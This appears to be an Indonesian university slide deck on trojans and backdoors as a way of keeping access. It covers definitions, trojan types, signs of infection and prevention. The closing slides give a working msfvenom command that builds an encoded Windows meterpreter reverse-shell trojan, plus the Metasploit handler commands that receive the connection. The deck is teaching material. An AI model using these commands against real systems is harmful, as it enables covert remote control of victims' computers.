You are on page 1of 14

Computer Hacking

Maintaining Access – Trojan & Backdoor

I Wayan Ardiyasa, M.MSI.


PENDAHULUAN
• Trojan dan backdoors dua cara/teknik yang
digunakan oleh seorang hacker untuk memperoleh
akses ke dalam sebuah sistem.
• Trojan & Backdoors memiliki berbagai varietas yang
berbeda, memiliki satu kesamaan.
• Trojan dan backdoors suatu aplikasi yang
berpotensi berbahaya dalam toolkit etika hacker
dan harus digunakan secara bijaksana untuk
menguji keamanan sistem atau jaringan.
PENGERTIAN TROJAN
• Trojan adalah aplikasi jahat yang menyamar sebagai
aplikasi yang familiar.
• Trojan sering didownload bersamaan dengan
program lain atau paket perangkat lunak.
• Banyak program palsu menjadi perangkat lunak yang sah
seperti freeware, alat spyware-removal, pengoptimalan
sistem, screen saver, musik, gambar, game, dan video
dapat menginstal Trojan pada sistem hanya dengan
sedang didownload.
• Iklan untuk program gratis, file musik, atau file video
FUNGSI TROJAN
• Digunakan sebagai poin untuk meluncurkan
serangan lain seperti Distributed Denial of Service
(DDOS).
• Trojan juga digunakan untuk memanipulasi file di
komputer korban, mengelola proses, Remote Jarak
jauh, melakukan restart serta shutdown.
• Bisa melakukan remote ke banyak host, sehingga
menyebabkan komputer host menjadi Zombie
SEJARAH TROJAN
PENGERTIAN BACKDOOR
• Backdoor adalah suatu aplikasi yang diinstal pada
sistem target untuk memungkinkan akses ke sistem
tersebut serta memberikan hacker mendapatkan
akses ke sebuah mesin komputer.
• Sasaran sebuah backdoor adalah untuk menghapus
bukti awal masuk dari file log sistem.
APLIKASI TROJAN
• Remote Access Trojans (RATs) : digunakan untuk akses
remote komputer
• Data-Sending Trojans : digunakan untuk mengirimkan
file target ke komputer hacker.
• Destructive Trojans : digunakan untuk menghancurkan
file target.
• Denial of Service Trojans : digunakan untuk DDOS
• attack Proxy Trojans : digunakan untuk tunnel trafic
dengan sistem yang berbeda.
• FTP Trojans : digunakan untuk membuat FTP dan
menyalin file target.
• Security software disabler Trojans : digunakan untuk
menghentikan antivirus.
INDIKASI KOMPUTER TERINFEKSI TROJAN
• Perilaku sistem yang tidak biasa, biasanya
merupakan indikasi dari serangan Trojan.
• Tindakan seperti program memulai dan
menjalankan tanpa inisiasi pengguna, CD-ROM ,
walpaper, atau screen saver pengaturan berubah
dengan sendirinya, tampilan layar membalik
terbalik, dan program browser membuka situs yang
aneh atau tak terduga semua indikasi dari serangan
Trojan.
• Setiap tindakan yang mencurigakan atau tidak
dimulai oleh pengguna dapat menjadi indikasi dari
serangan Trojan.
MENCEGAH SERANGAN TROJAN
• Gunakan Antivirus yang up-to-date
• Gunakan firewall
• Tidak menginstal aplikasi yang diunduh dari
internet atau membuka lampiran e-mail dari pihak
yang tidak dikenal.
• Aware terhadap perkembangan Keamanan
Informasi.
TEKNIK MEMBUAT TROJAN
• Banyak cara didalam membuat trojan, salah satu
aplikasi yang bisa digunakan adalah msfvenom
• Berikut ini command line membuat trojan :
• msfvenom -p windows/meterpreter/reverse_tcp -e
x86/shikata_ga_nai -i 5 -b ‘\x00’
LHOST=192.168.23.103 LPORT=443 -f exe >
nama_trojan.exe
HASIL DARI MSFVENOM
STATUS FILE DARI VIRUSTOTAL.COM
EXECUTE TROJAN DENGAN
METASPLOIT
• Setelah berhasil di create, maka yang perlu
dilakukan agar mampu komputer target kita remote
yaitu memanggil metasploit
• Buka metasploit, lalu ketik perintah ini :
• msf> use exploit/multi/handler (enter)
• msf> set PAYLOAD windows/meterpreter/reverse_tcp
(enter)
• msf>set LHOST 192.168.1.1 (enter)
• msf>set LPORT 443 (enter)
• msf>exploit (enter)
Terima Kasih

You might also like